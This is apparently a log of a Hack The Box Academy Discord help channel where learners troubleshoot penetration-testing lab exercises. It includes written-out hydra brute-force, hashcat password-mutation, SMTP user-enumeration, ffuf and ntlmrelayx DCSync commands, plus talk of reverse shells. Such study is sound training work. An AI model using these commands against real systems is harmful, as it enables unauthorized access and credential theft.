#modules
no
Folks... on Footprinting / SMTP ... I am not able to answer the 2nd question (with the tool and provided resource). The metasploit module does it for me, using the same resource. Can someone DM me?
u are on the right way to get arrested when u're 18
sure
Lol
i have protonvpn
more than enough then 
smh
The updated linux privilege escalation is much better now in my pov
lol youre in for a rude awakening one day
How did you get the IP of my coffee machine?!
10.1.10.149 actually
I can never remember
Class is related to subnet, not IP scheme.
but those just indicate private IP space. You could use 10.0.0.0/8 as a class A, or 10.0.1.0/24 as a class C.
yeah but theres still a general "default" convention with em
Thanks for your help!
took sunday evening off. and was exhausted monday evening so I crashed as soon as I got home, still at work today
Im only gonna worry about filling bits and pieces in over the week and then really double down on Saturday and Sunday to get it to standard
hi, i'm having some trouble getting the reverse shell to run from "Attacking Common Applications" under "attacking splunk"
i edited the script that was provided to put my own ip/port in, but i'm not getting any connections back
u should have it done in 8-10 hours without any problem
yeah but evenings are exhausting to me so im pacing things
u got a lot of time to write it luckily
yup so ima use it
can't u give more info about that?
shouldn't be too hard in my notes i just have
Configure the "reverse_shell_splunk"
can i dm you bro
then i just used tar and uploaded the file while listening
i have no more notes
i guess it was just follow the section
ok thank you
in what port are u listening
maybe the firewall is blocking it
I checked the section and it is just put ur ip and port in the script and upload it
443
i'm not getting any connections back
did u tar the file
How long did it take?)
yes bro , like the section
reset it
it is too simple to do, it is just change the ip and port, start the listener, convert it to tar and upload it
ok bro
after completing the linux module, which module did u guys do next
what u need to learn
at first i wanted to do password attacks module
but it has a bunch of prereqs
and then the prereqs of those prereqs have prereqs
then learn the prereqs
can i skip windows fundamentals since ive used windows all my life basically
whats the fastest way of becoming a hacker
why u ask me
do what u want
if u think u dont need to learn about windows then dont learn about it
ok
good link, thanks
consistency
so if i study everyday can i become hacker by the time school starts up again
id just recommend following the cpts path even if you dont plan on doing the exam
ok
in 2 months u can become kobe bryant as well
goodnight peeps
I need help with this idea.
In shellcoding tools
the question is
The above server simulates an exploitable server you can execute shellcodes on. Use one of the tools to generate a shellcode that prints the content of '/flag.txt', then connect to the server with "nc SERVER_IP PORT" to send the shellcode.
Do I need to create my own shellcode? like using execve? since I tried other standard shellcodes and I get "failed to execute shellcode". My best guess is that it's too many bytes long, since I tried msfvenom without luck.
Just from re-reading it, I can use one of the tools to generate a shellcode. Am I doing something off, since when I test on my pc it works great?
I'm working on the Information Gathering skills assessment and am on the last question on subdomain enumeration.
I'm given a clue that a particular string is located in the subdomain. Gobuster has given me several subdomains working from a wordlist. How would I move forward searching for one that contains the string?
It seems the possible formats could be {str}123.app.githubapp.com or app.visit{str}.githubapp.com.
I'm not certain how to approach the problem.
Well never mind. theHarvester was my friend.
anyone free to talk about Exploiting Web Vulnerabilities in Thick-Client Applications? stuck at the first stage of logging into fatty client .new
constant connection error
You can dm for clarification if you want
Still need help for this.
I have made a little more progress as follows:
||- Creation of accounts with "admin" prefix is forbidden, however there are no accounts called "admin" or "administrator" (tried case sensitive as well)
- Creation of guest account is forbidden, and there is indeed an account named "guest"
- Enumerated all support.xx from aa-zz (support, support.it, support.uk, support.cn, support.gr)
- For each of the above support accounts, and guest, I encoded the cookie properly with the role (i created a larger list of case-sensitive roles, such as super, superuser, sudo, root, admin, Admin, administrator, Administrator, staff, manager, etc.etc.)
- I also received the message "time to roll up your sleeves and move on" ||
Would appreciate if someone could point out if I'm in a rabbit hole, as I'm unsure if i just have to enumerate more roles or if im not even close at all
hi so I found the interesting file I'm pretty sure, but not sure how to read what's inside? did you have to escalate your privileges to find the flag or is grep really all you need here?
i dont know what module this is for but running strings on everything is good habit
otherwise, cat or type
Grep + common knowledge of HTB's flag structure
cat <file> | grep HTB
grep -rnw HTB
I have a doubt about Credential Hunting in Linux. The exercise wants us to use hydra and bruteforce the ssh using the Resources (Password.txt and Username.txt)?
try to get the password of the support user. Then take a close look at the cookie after login.
Does bloodhound have a way to list all the ACLs of a particular user like the Powerview's Get-DomainObjectACL command?
Anyone Please Help : Attacking Common Applications - Skills Assessment II What is the URL of the WordPress instance? i have found the vhost b*** , but it is not accepting as an answer.
Enter the full URL
can i DM
Sure
not sure if it is intentional, but i found a credential for the support.gr account with a working password that deviates from the password policy on the account creation page. (it does not have $#@)
So im assuming if i try the unfiltered 14million list in rockyou.txt i can eventually find the password of support? (since likely it does not follow the traditional password policy as well)
Only thing stopping me from doing that is the occasional 25 seconds delay the login page has to prevent total bruteforce
Thank you.
i already have the working credentials for support.uk but PayloadBunny said to try and find for support (without the country)
after that you need to look at the cookie and see something special. Maybe you can decrypt the cookie
Take a look
i know how the cookies work (including how to decrypt and encode), what's left is enumerating the roles which i mentioned i couldnt in my main help message
can i dm?
ok
thanks for the help
How to learn hacking or can anyone help me to learn
Probably like 2-3 long days of studying
Wow, lol
It says it would take 7 days
Well, you gave me a motivation
With regular hours it would yea
Any help on the last two questions of the Skills Assessment part 2 on Active Directory Enumeration and Attacks? Struggling to get a shell on DC with the user that has GenericAll privs :/
anyone around for some pointers on Footprinting medium chall?
Dm if you'd like
Hi, i need help on Notetaking & Organization, anyone know why the question "Steve is learning about the tool that can make logging a session easier. He messages you for help mentioning that he would like to try to split the panes vertically. What do you tell him? (Answer format: [key] + [key] + [key], i.e., fill in the values for "key" and leave the brackets and + signs.)" is not accepting the answer ||[Ctrl] + [B] + [%]||
In the burp intruder section from using web proxies, I found the index.html but it gives no output, so I can't see a flag
Is there something Iโm missing?
you can dm if you want but cant answer til 2 or 3 hours
cause gotta leave the pc
The answer is on the page. I think about half way down
NVM, didnโt do it right
let's not share flags, even if they are non working ones
Hi, I'm in module pivoting in section web server pivoting with rpivot, i did what i should but when i connect to the web server i don't see the flag, can someone help me
I tried what was written on the red line but it gave me the wrong answer
Dm me what you have I'll help
Maybe try gobuster vhost
why are you taking pictures on your phone?
what makes you think hes a boomer?
taking pics with phone instead of using lightshot
i did a bit of ffuf on tryhackme and i dont remember having to include a port. maybe thats the problem
Because I'm on discord on my phone.
But that's not an answer to my question
Why does it not work?
Provide the module, chapter, and question as well as your full command
Skills assessment - web fuzzing from the attacking web applications with ffuf module
and the command?
Is in the picture
have u tried it with 80 and 443
@valid cipher port given is 32252
Try https with port 32252. If I remember correctly
Hi everyone,
I'm doing Password Attack module, and when attempting to bruteforce SSH with crackmapexec, it seems very slow (1 request / 2-3 seconds).
Is there a way to speed up ? Is it a default parameter for stealth ? Or is it my hardware fault ?
It will take hours just to finish a simple exercise
Does not work
@analog dock ffuf -w ./wordlist -u http://target.com -H "HOST: FUZZ.target.com" -fs 69420
try something like that.
Yes its vhost this one should work
Thanks
no prob
oh
Heyy ....
Anyone has "suse certified administrator" SCA question dumps ?
If you still need help, send me a DM
ive got it already, thanks
?
Try to explain your issues without spoiling anything in terms of potential routes or commands
Well it's not really a spoiler if it's wrong right?
but it can mislead other users
Anyways Iโm at the second question of the skills assessment - Website of module Login brute forcing. Using the user found in question 1, and rockyou as a pass list, it gives me false positives
inspect element and get the name for the form as the example went through
I checked the form with burp suite and changed this accordingly
I sent you a dm
I was dumb
you can view the source code of the page, and see if you can reproduce the same behavior by sending a file that has only the paragraph arguments
example: are you sure you are running php code and not html with that payload?
Doesn't html use <script>?
I was referring to the web server
I need help with logrotate and sudo sections in linux privesc. Can I dm?
Actually only logrotate section. Anyone can help?
Dm me if u want
Thanks
Can anyone help me with this?
I have a doubt about Credential Hunting in Linux. The exercise wants us to use hydra and bruteforce the ssh using the Resources (Password.txt and Username.txt)?
Linux PrivEsc/ Credential Hunting
Find the WordPress database password.
You don't need to bruteforce anything.
Search for the credentials on the machine
This is the module https://academy.hackthebox.com/module/147/section/1320
No web server is running i can only see 21, 22, 139 and 445 ports open
Does anyone know a discord server for hacking, for topics outsite of hack the box scope?
Ah, Password Attacks, not Linux PrivEsc
You have to create a mutated list with the given password. Then you can bruteforce an access to SSH with it
Legal discord channels are many.
TryHackMe, TCM Security, Kali, Parrot OS, and many others. Just pick a topic and see if they run a Discord channel.
For illegal things, read #rules
I have already created one using hashcat --force pass.txt -r /usr/share/hashcat/rules/best64.rule --stdout | sort -u > mut_password.list
Where pass.txt have the password which was given as a hint
and If i try to use hydra with hydra -l Kira -P mut_password.list -V -t64 ssh://<IP>
Its not working
Do I need to use another rule type?
When you say its not working, do you mean it just continues to run?
it does not give me the correct password from the mutated list
Oh, are you not using the custom.rule file?
I have tried that as well
If you are saying the custom.rule is
:
c
so0
c so0
sa@
c sa@
c sa@ so0
$!
$! c
$! so0
$! sa@
$! c so0
$! c sa@
$! so0 sa@
$! c so0 sa@
Did you read the Hint?
I did, that is why I'm mutating "LoveYou1"
Yes... but the Resources contains a custom file for mutating the password.
You're mutating with one of the standard files.
Right
I was stuck in this form 12 hours
Which Module?
Thanks I will try that
yes
just because I did not see the custom rule attached
Well, I hope that works for you. My notes are a little spotty on that Module
Can I DM you?
I don't think I'll be much help on password attacks. As I said, my notes are very very spotty
okay
I have mutated the password with the custom.rule
That was literally the module that I realised I needed to take better notes
I have already created one using hashcat --force pass.txt -r custom.rule --stdout | sort -u > mut_password.list
Where pass.txt have the password which was given as a hint
and If i try to use hydra with hydra -l Kira -P mut_password.list -V -t64 ssh://<IP>
Its not giving me right password
Just to be clear... you are doing this chapter right? https://academy.hackthebox.com/module/147/section/1320 Credential Hunting in Linux?
yes
The question being: Examine the target and find out the password of the user Will. Then, submit the password as the answer.
Yes but if you see the hint you will know what I'm doing
Just making sure we're on the same page
we are
Oh
You know what it might be
let me check, one moment
Yeah... your 2nd issue is that you are using the username "Kira", not "kira"
I'm sorry but I have tried both of them
I'm still not sure what is wrong with my list
Try using ftp instead. Its better for testing.
SSH is slower, and has a lot more timeouts
nope its the same
what's in your pass.txt?
LoveYou!
lol
np. Just glad my notes were up to the challenge.
I'm stuck at this when loading the command; after 2-4 mins there is still no response. is this normal?
That one takes a bit, so give it a little time. 3 minutes does sound a little excessive
Maybe worth resetting the environment
never mind, I try to switch it to sharpview, and wait for it
thanks
Hello fellas, I'm having a trouble with the following question in academy: If I wish to start a capture without hostname resolution, verbose output, showing contents in ASCII and hex, and grab the first 100 packets; what are the switches used? please answer in the order the switches are asked for in the question.
My answer that's "incorrect": ||nvXc100||
You need to provide context when asking questions like this. We have no idea which Module/Chapter you're on. There's literally hundreds of questions in the Academy.
Oh, sorry, the question is from: INTRO TO NETWORK TRAFFIC ANALYSIS, Tcpdump Fundamentals
You need to ||put a dash at the beginning to indicate that the characters are switches, and then you need a space between the letters and the number||.
Thank you!
it's almost 9 mins, it still responds with nothing...
Hi guys, any hints for escaping restricted shells section in Linux PE module ?
Hi guys!
Anyone pass footprinting>smtp?
(Enumerate the SMTP service even further and find the username that exists on the system. Submit it as the answer.)
I tried
sudo smtp-user-enum -M VRFY -U /usr/share/wordlists/metasploit/common_roots.txt -t 10.129.214.65
sudo smtp-user-enum -M VRFY -U /opt/useful/SecLists/Discovery/SNMP/snmp.txt -t 10.129.214.65
smtp-user-enum -M RCPT -U /usr/share/metasploit-framework/data/wordlists/unix_users.txt -t 10.129.214.65
sudo smtp-user-enum -M VRFY -U /usr/share/metasploit-framework/data/wordlists/unix_users.txt -t 10.129.214.65
ismtp -h 10.129.214.65:25 -e /usr/share/metasploit-framework/data/wordlists/unix_users.txt
smtp-user-enum -M RCPT -U /usr/share/metasploit-framework/data/wordlists/unix_users.txt -t 10.129.214.65
no luck
any hint here?
can anyone tell me why i am answering questions when i am just starting?
i am expected to have the answers and im just now starting, makes no sense
it's backward: the first 3 questions ive answered, but they expect me to know what OpenVPN they use to connect to the labs. i just started and def don't have the answers; now having to find the answer is a bit backwards learning for me when i do not have the fundamentals yet
Hi everyone, I am doing the module Windows Attack & Defense, more precisely the exploitation Print Spooler & NTLM Relaying. I am always trying exploitations in my own home lab to experiment more with the exploitations and patches. In this vulnerability, we use impacket-ntlmrelayx -t dcsync://172.16.18.4 -smb2support to relay a connection from a DC to another one and try a DCSync. But we can see that ntlmrelayx tries to use Zerologon; I don't understand why and the course doesn't talk about it.
I'm first time asking about it
Hi! In the Footprinting module, smtp section, I'm having a problem finding the user they are requesting
I have tried with nmap script, with metasploit list
I have even tried with bash scripting and telnet vrfy command
I have found quite a lot users but not the one they are requesting
same issue
again need help with these questions on walkthrough
makes no sense why i am doing this and i just started
with all due respect, but this is trash that they make you go through this with NO knowledge base help nor reading materials. been stuck on the same question for over an hour and reading whatever they have on the site but it does not help with questions
Aa yes I checked. But it didn't work
It takes quite some time tbh
Also try hitting enter a few times
Thanks, I got a help from another friends
Cool
I am stuck on what looks like a malformed question or I may just be crazy...
PIVOTING, TUNNELING, AND PORT FORWARDING > Meterpreter Tunneling & Port Forwarding :
Which of the routes that AutoRoute adds allows 172.16.5.19 to be reachable from the attack host? (Format: x.x.x.x/x.x.x.x)"
The autoroute output looks like this :
in the format x.x.x.x/x.x.x.x, the only valid route I can see is the second one 172.16.4.0/23 in which 172.16.5.19 is.
When I post that subnet in the form ||172.16.4.0/255.255.254.0|| it tells me I am wrong...
any suggestions please ?
umm... after some extra testing I found the valid answer but I would love to discuss with other people who did that module because it just looks like a question error to me
having problem on the linux privesc with logrotten. anyone to help me quick?
Sure
Hey guys how do you make notes? I'm thinking of effective ways to keep notes. Any tips would be appreciated
I like OneNote. Free and notes are on the cloud. Had horror stories with cherryTree
Obsidian, OneNote, etc.
https://academy.hackthebox.com/module/162/section/1533
this is the note structure I always use for reporting purposes, when pwning a box.
For HTB and training notes? I have it like this
I have Enum 1st, obvious reasons
Then Priv esc, and so on
I document how to do each question with step by step, and each command called:
nice
I took a different approach and extract the topic , as the main goal, at least for me, is use the knowledge for any box. But that is a good idea too.
Of course, that's separate. I've got notes from the module, and the cheat sheets saved. But if I ever need to come back to do a refresher, its easier to replicate from notes, and understand why and how you do something.
the reverse shell isn't showing up on nibbles. I went back and decided to try the privilege escalation section of getting started again. do I have to start over?
Better to move away from cloud-based solutions, since you can't use them for customer data.
if someone could help me get the reverse shell and then you can leave me to keep trying the next step that would be great
etc
who said is for customer data?
On my case, is for my own notes.
But you can have customer data on the cloud as long as you use proper encryption.
Yeah, but then you end up needing 2 sets of note-taking programs - why not just unify?
And no, you can't just 'encrypt' the data - it depends entirely on contractual obligation.
the cloud is no less or more secure than on premise, it just depends on how you use it.
now you are changing topics, sorry
You can have customer data on the cloud, no issues with that. Is it allowed or not? depends on the contract
Hello, in socks over rdp...
I managed to start the socks plugin on the foothold. From there I connect successfully to the pivot and transfer the socks server. Started it. Verified the listening on the foothold with netstat. Then configured proxifier in socks5. Then it fails to connect to the distant target (172.16.6.155). Mstsc.exe does not appear in the proxifier window either.
How to solve that?
So are you just going to not do contracts that have a customer require your data to be stored locally? There's a reason the course touched on this.
err what. I've never heard of a client okay with cloud based hosting of client info
sorry, you seem to go from one place to another and talking different things
my own note taking, is done on the cloud
keeping customer data on the cloud? it depends on what you sign
It sounds like you're the one confused here. I just said that if you do use a cloud-based note solution, you end up with having to use two note-taking solutions anyway, since all customer data has to be local. You might as well unify, at that point.
my example to the Op was about how I keep my notes for HTB, OSCP and learning
nope, I am not
hi is anyone available for a DM from me so that I can get one on one help with this box?
which box?
nibbles. its for the getting started module.
I meant the nibbles privesc section of getting started module
not actual box
what's the question or what issue are you facing?
its a walkthrough and I am trying to get a reverse shell and I think I missed a step
etc
its not letting me get reverse shell
what's the error? mind posting?
did you check if the port is available?
no error just no reverse shell
which is fine but youre going to have to switch later on if youre going to do client work, so why not switch now? is all me, rat, and 90% of people doing offensive security are saying
nah, I do not like to keep my own notes locally
personal preference, better backup
that's just me, and again, that's for MY NOTES
I sync my encrypted obsidian notebooks. Got em on my phone, laptop, desktop, and work laptop.
DM me
ok will do thanks
... okay? and? We're trying to point out that you still have to take notes during a penetration test. Those notes will now have to be stored in a second note-taking app, that is local. So... since you already have to use a local solution, why not migrate all your notes to that solution, instead of using two?
anyone here can gimme some hint for assembly data movement task?
I couldn't find a thread to post this question in, so I'll ask here and if not allowed I understand. At work today I found an iPhone in a stolen recovery truck. I process the trucks. I'll detail, do mechanical maintenance and body work to get them ready for retail sale. I'm just wondering if there is a way I can get it unlocked so I can contact the owner to return it to them
some people are just stubborn about doing extra work. Or they just dont care about client data and will get a rude awakening down the line.
read #welcome for verifying account for access to rest of the server
but otherwise no your question about unlocking stolen phones isnt welcome here
It's not stolen but thanks anyways
drop it off for the police if its genuine
Will do thanks boss
I work in repair and moderate the mbl repair discord, I see your kind of question 10x a day
sorry madf0x, have you done maybe the assembly module?
Ive not but I do know some assembly so ask your question anyways
i have a task to move the value in "rsp" to "rax". I tried with mov rax, [rsp]
got segmentation fault error
which asm flavor
intel
also [] is for dereferencing the address in the register, so youd be transferring data to the memory pointer stored at that location, so it wouldnt be moving the rsp value to rax per se
i see
so drop the [] if you want to straight clone the contents of rsp which may or may not be just a pointer value.
[] for when you want to access the data the pointer points at.
Im guessing your situation may not even involve pointers at all, hence the seg fault for accessing an invalid memory region
i need to have move value from rsp to rax
so [] makes sense here for me
anyway, one day imma figure this out
well not necessarily
[] is for the value of the pointer stored in rsp
no [] is for the raw value stored in rsp
if the contents of rsp = 4, then [] would try to dereference the memory address at 0x00000004 which would be invalid
if the contents of rsp = 0x76100341 and that happens to be a memory address containing the value of 4, then youd use [] to pull the value 4 instead of copying the memory address
best of luck
hello everybody, anyone know how to unzip a file under a RDP Windows machine?
explorer
I'm stuck under the question to calculate the hash of a file in the File Transfer module
I can't find winzip or anything like that
what version of Windows
I do not remember, but the most recent Win versions can unzip that via explorer
after Win2016 I think
another alternative is using PS: Expand-Archive
Expand-Archive -LiteralPath C:\temp\file.zip -DestinationPath C:\temp\file
ty y'all....
but now, does anyone know why this error message: [-] SMB2_TREE_CONNECT not found upload_win.zip
could be a .zip restriction/policy under the Windows Machine?
yep
I'm not using Kali
ok.
also Im not using xfreerdp; instead Im using Remmina
switching to xfreerdp
Need a nudge on the last flag of the final assessment in the deserialization module? Figured out the checksum mechanism and found the hidden feature, but it seems like my generated payloads arent working
@slender shoal sorry to bother you with a silly question but, how am I supposed to find the /drive: ???
now I'm in xfreerdp
hmm ok.
ty @slender shoal
I really don't know about that share folder
is this a xfreerdp feature?
the share will show up in explorer
Htb Academy linux privilege escalation. Enumerate the linux environment and look for interesting files that might contain sensitive files. I am stuck here. I need answers .
Try grepping for something that looks like a flag.
It's also possible to escalate privileges into the lab_adm user, which will point you in the direction of the flag
72 modules done. 8 modules to go! I will get to zero modules.... if they stop releasing new ones!
Don't know if anyone is available to assist with this. I'm in the dnsadmins section in Windows Priv Esc and I have gone through and restarted the instance several times. No matter how carefully I follow the steps, I can't seem to add myself to the Domain Admins group. Is anyone available to assist with this?
Out of curiosity, how many of those modules did you pay for out of pocket versus getting the trickle-down from the cubes you get by completing a module?
Most were on trickle down + subscription
Subscription more than others
I only had to buy some towards the end.
It depends how hard you go at it. If you are smashing through them, then you'll need more cubes in a month, so higher tier sub is better.
oh so you're also getting the monthly cubes from silver annual (or whatever subscription you have)
Has anyone here made it through the dnsadmin section in Windows Priv Esc? I could really use some help. I don't understand why it's not working.
Yeah, I was on silver. I upped to platinum last month as it was more cost effective, as the t4 modules cost 1,000 modules each.
you would want to use ssh2john to turn it into a hash, and then crack the output of that
but this key isn't even encrypted with a password
so what are you trying to crack 
oh wait nvm I'm dumb, I guess keys don't explicitly say that they're encrypted
maybe it's an RSA thing
regardless, ssh2john is your friend, but I don't remember needing to do that during the pivoting lab
did you do chmod 600 id_rsa?
Should very much be following the steps in the lab. I did a shutdown -l after doing all of the permissions changes, which logs you off. You get the permissions when you log on next.
usually theres a header if it is encrypted
That's what I thought but I just generated a new keypair on my system and the header wasn't there
well the ones ive seen in the modules that were encrypted all had a header
That's not the issue. The issue is that I can't even seem to get added to the Domain Admins group at all.
hence why I also said there needed to be a header at first
I realize that once I'm added I need to log off and log back on. I'm not able to even get to that point.
yeah, Im just throwing my chips into the pot that the key being encrypted isnt the cause of Moo's problems
Sadly, I need to goto sleep. If you're still having issues tomorrow, I'll run through my notes to find out what you could be doing wrong.
Okay, thank you. I'll message you tomorrow if I can't figure it out.
just tested it, it's possible for an SSH key to be encrypted without the header, and you can still crack it. Default ssh setup on ubuntu 22.04
cool
To get back to your question, genuinely don't remember needing an SSH key, pretty sure all the credentials you need are on the box. If you really want to use an SSH key (totally valid, great persistence method), just stick your own public key into the authorized_keys file and use that key instead
I find it really hard to learn the material in the way HTB is teaching it. I have no prior Linux knowledge and the questions in the Linux mod dont always line up with what was talked about in the txt. Doesnt help that im more of a visual learner. Any suggestions?
can anyone nudge on file upload skill assessment. I believe i have the correct formatting for the URL, but not finding my test image i uploaded
@slender shoal i was stuck in the Filter Content section in the Linux Fund. for 60min before i said fuck it and looked up the answers. i dont understand how people are coming up with the last command without prior knowledge
i must have been overlooking it. i did man help. even tried screening in in the house lol
HTB content is very much geared towards teaching you a little bit, and then putting you in an unfamiliar situation related to what was taught with the expectation that you reach out of your comfort zone and figure out how to discover the solution on your own.
@SQLMantra
You can have customer data on the cloud, no issues with that. Is it allowed or not? depends of the contract
Am I making an error in the file upload skill assessment? I cannot view any files I upload. I've also tried at the contact directory.
Thanks for help
Thanks
anyone know why the python3 uploadserver with default port works
```
File upload available at /upload
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
```
But with port *443* NOT
```
$ sudo python3 -m uploadserver 443
/usr/bin/python3: No module named uploadserver
```
under the file transfer module, Linux File Transfer Methods section: if the target Ubuntu machine has no options to decompress files with unzip or 7z or anything else, what options do we have?
yes if you still need help with this get back with me
DM if that's needed
Hey everyone! I am struggling with "Login Brute Forcing" module and I am currently doing the 2nd flag in the "Skill Assessment - Website" section.
The task is: "Once you access the login page, you are tasked to brute force your way into this page as well. What is the flag hidden inside?".
The hint is: ||"You may reuse the username you found earlier. Make sure you got the correct fail string and parameters". The username the hint is talking about is "user" cause that is the username that is used for the previous flag, also I have checked the parameters of the form and they are: user and pass but I'm not really sure what the hint talks about with "fail string".||
I am trying to execute the code: ||hydra -l user -P /opt/useful/SecLists/Passwords/Leaked-Databases/rockyou.txt -f HOST -s PORT http-post-form "/admin_login.php:user=^USER^&pass=^PASS^:F=<form name='admin_panel'"|| and the correct password seems to be ||123456789||.. but when I try it out in the form, it does not work at all.. what am I doing wrong here?
Hydra will give false positives sometimes.
You may find a similar question here: #modules message
you can dm me if u need additional help
Thank you! I thought that might be the meaning of those words in the hints, but I think it's phrased a bit poorly.. isn't it? Why would you call false positives "fail string"? 
false positive - hydra tells you it found working credentials when in fact it did not
Thanks, that solved it for me!
I know what false positive means, what I was saying is that the hint doesn't say "false positive" instead it talks about "fail string" which sounds like something different
fail string is not false positive, but a wrong fail string causes false positives
I've used hydra a lot, even on real engagements; a few times it's given me false positives
Need a little help with this one... Please
Connect to the target host and search for a domain user with the given name of Robert. What is this user's surname?
User and Group Management section, INTRODUCTION TO WINDOWS COMMAND LINE
hint was: Get-ADUser Cmdlet along with a "-Filter"
Are there official walkthroughs on the module questions and labs anywhere?
I'm getting tired of searching for bits and pieces of information on each question.
I think not. If only to Tier 0
See also:
https://help.hackthebox.com/en/articles/5188925-streaming-writeups-walkthrough-guidelines
the hint is clear use Get-ADUser with the filter tag and if you don't know what to filter for just use * to get all of them and the question did give you a username, you can use that with the ||-Identity|| tag
if you are stuck you can just ask here or look up the same question that others have asked here before
Thanks, I figured it out, was having issues with the FTP footprinting
They tell you to submit the whole banner, but by that they mean the whole banner minus the "200"
200 is status code, not part of the banner
They also didn't explain the portion where it asks you for an email as password for the anonymous login.
So I just figured that out on the fly I guess.
yeah, but it asked for a password and I bypassed it by just hitting enter
Yes
it would have been nice if the lesson explained that
Thats how anonymous works
Just wasn't explained
not all things are explained in modules ¯\_(ツ)_/¯
But put it in this perspective: how can you log in as anonymous if it's password protected.
Yeah, that's too bad, good thing I have some background knowledge.
it's not about having background knowledge. Sometimes it's just that the obvious solution is correct ¯\_(ツ)_/¯
Thank you
Well I did a couple of learning paths on Tryhackme before coming over to HTB Academy, so that helps.
Even though Tryhackme is garbage in comparison to HTB Academy.
I had (virtually) no experience prior to htb
yea sorry but you haven't done nearly enough on either platform to judge either
Module name: ACTIVE DIRECTORY ENUMERATION & ATTACKS
Section name: Domain Trusts Primer
Question:
What SharpHound command should I use so that bloodhound can map domain trusts like what is shown in the picture in the "Visualizing Trust Relationships in BloodHound" subsection?
Currently I run .\SharpHound.exe -c ALL --searchforest --zipfilename <file>, but I get "NO DATA RETURNED FROM QUERY" when I tried to use the "Map Domain Trust" analysis option on bloodhound
Hello
Stuck In Password attacks "Passwd, Shadow & Opasswd"
I have got the shadow and passwd files.
For cracking purposes, I'm using hashcat -m 1800 -a 0 unshadowed.hashes /home/username/Downloads/mut_password2.list -o /unshadowed.cracked
and the mutpassword2.list is generated from using hashcat --force password.list -r custom.rule --stdout | sort -u > mut_password2.list
here the custom.rule was used from the resources. Am I missing something?
Please ignore, I found the answer
Hi, can someone help me on 'Exploiting Web Vulnerabilities in Thick-Client Applications'? i am on the last part where i should be amending 'user.java' but i think i am not editing it correctly. can someone advise? should i be adding the portion in or overwriting the existing content of the classes?
Hey i wanted to ask: the MAC address returned in the output here is of the target host, right? What if the attacker and target are both on the same network? Then whose MAC address will be returned, the attacker's or the target's? Can we confirm it by checking and matching the attacker's (our) MAC address with the returned MAC address?
I can't send the pic here **
yes
Skill Assessment - Web Proxies, Why cant I get the flag, it tells me to enable the button and click it to get the flag, but i have done that and it just reloads the page with the exact same data
Enable the button, and when you did that, intercept with burp
I have enabled the button
Send to repeater and keep trying
With ZAP
Hint says you have to click more often right?
Aaaaaaaaaa
So send it to repeater and try till you see content length change
Oke
doing password attacks and cannot get hydra to compile with ssl support
I have been trying to follow the instructions on the github
pw
but some of the packages are not available
first http://dontasktoask.com/ and which section are you on? what are you trying do to? and what exactly is the issue?
I am supposed to decode this until i get a 31 character string, how does this help? Its the only value I can get using burp
read #welcome and #rules, then use /verify at #bot-commands, and if you are having issues on thm pls don't ask here
lets change gears: where specifically can I get the resources on the pwnbox for a module I am doing
I tried to decode it as base64
I got the answer brother thanks
feel free to shoot me a dm if you still need help
e.g. I am doing password attacks, network services & just need to the resources that are in the module on the pwnbox.
so you issue is you can't get the resources on to the pwnbox?
just wget the resource link on the pwnbox
my original issue was I am using my own version of kali and hydra was not compiled, so that I couldn't finish part of the module. I tried to compile from source but as certain libs were not available, I ended up down a rabbit hole of trying to troubleshoot when I can just in fact use the pwnbox.
Thanks
I had originally done a simple python http server on my own machine on the vpn but was getting a 405 error when using wget from pwn
if you are on kali did you try sudo apt install hydra ?
Nvm I found the answer
yeah but for some reason it threw up the error [ERROR] Compiled without OPENSSL support, module not available!
so was going to compile from source instead
got frustrated and didn't even think to wget the resources link
thanks
also not sure about kali but a quick purge and compile hydra from source worked for me on the pwnbox
I tried that but was not playing ball. I was considering switching to parrot anyway so this might have just been the final thing.
Guys are there any similar courses, like learning the mindset of hackers, similar to the one in htb academy? Appreciate any help
also just to double check: when compiling, it throws a lot of errors but it still works. is there any chance you got an executable named hydra?
I did get the executable
so it works for you in the end?
but wait how tf does your kali not have hydra?? it's one of the default tools
WSL2 maybe?
yo
I need the command to get the answer to the linux privilege escalation question 1. I have tried different regex commands. I need help
try grep for it
is medusa the only tool you can use for attacking ftp in attacking common services?
i tried hydra with both 64 and 48 threads and i got nothing
hydra worked for me, are you using the provided resource wordlists?
yeah
did u rename the user.list to username.list?
yh thats just what i saved it as
just easier for me personally
what have you tried
cuz if i remember correctly that lab was pretty straightforward
once u found the archive
maybe try less threads ?
im running it on the default settings rn just wanted to check i wasnt wasting my time
dm?
sure
When I want to run the built chisel binary on the ubuntu server it gives me the following error. Does anyone know how to fix this? https://academy.hackthebox.com/module/158/section/1437
did u check md5sum of chisel before/after transfer ?
the same
try with chisel_1.8.1_linux_amd64.gz
that should work but if it doesn't then a trick you can use is you can actually use the installed chisel binary on your kali as portable binary on your target machine
works just fine, thanks. why does this version work though?
no idea but there is some stuff about the arm version needing some library that target machines on HTB don't have installed
why would you need to get root? the goal of the lab is getting the flag in that zip file
how do i see at which port it opened the connection now?
and you do have the -v tag on your chisel server right?
maybe try reverse proxying?
hmm interesting. I believe I simply used port 1080 and it worked
yea you could be on port 1080 because that's the default port for this or you could try set the port manually with 1080:socks
your screenshot uses port 9050, no?
yeah saw it too, weird
in my proxychains4.conf there is only socks5 127.0.0.1 1080 though
got it.....
proxychains4 uses proxychains.conf ?????? not proxychains4.conf???
umm that'd be kinda stupid but not impossible
im doing login brute force module
oh nvm its giving me false positives for some reason..
this is the cmd i used
very close to being correct, but the smallest details matter
so its not correct? ://
delete the command?
idk what is wrong here tbh..
check form name is correct
i've changed log-in to login but still no :(
i've got it thanks
Nice
I need help with the broken auth skill assessment. I've altered session IDs, I've tried narrowing down my wordlist and brute forcing, sending one request every 10 seconds. I've tried altering session IDs AND changing my user agent in the same request, but i keep getting the same error, and i'm not sure why.
hello i am stuck on USING THE METASPLOIT FRAMEWORK MSF Components Modules questions. when i try to use my workstation and use metasploit and use the EternalRomance and run, it shows Service start timed out, OK if running a command or non-service executable...
[*] Exploit completed, but no session was created. what should i do, and what is wrong?
Uhh? Is it normal that module/115/section/1124 box goes to https instead of http?
It keeps redirecting to HTTPS
Which makes me unable to go to the webpage
weird
It's strange, because in the previous part it did work
Restarting the machine, hopefully it works.
Ok it works now. Strange bug, anyone knows why it does this?
Now I am curious what the problem was
curious, just started it and same problem as you
Hahaha very weird.
Hi guys, attempting to do an Academy lab/exercise with Bloodhound, however the targets for attacks have changed. Resetting the "Target" machine does nothing. Any way to reset the other machines that are targets I can go after?
When you restart the lab, all the machines in it restart.
weird as one of the attack paths is not listed like it was last week. hmm. Any thoughts?
the table showing the attack methods are different when I run the lab...something must be broken on the reset.
I don't know if anything has been changed in the labs.
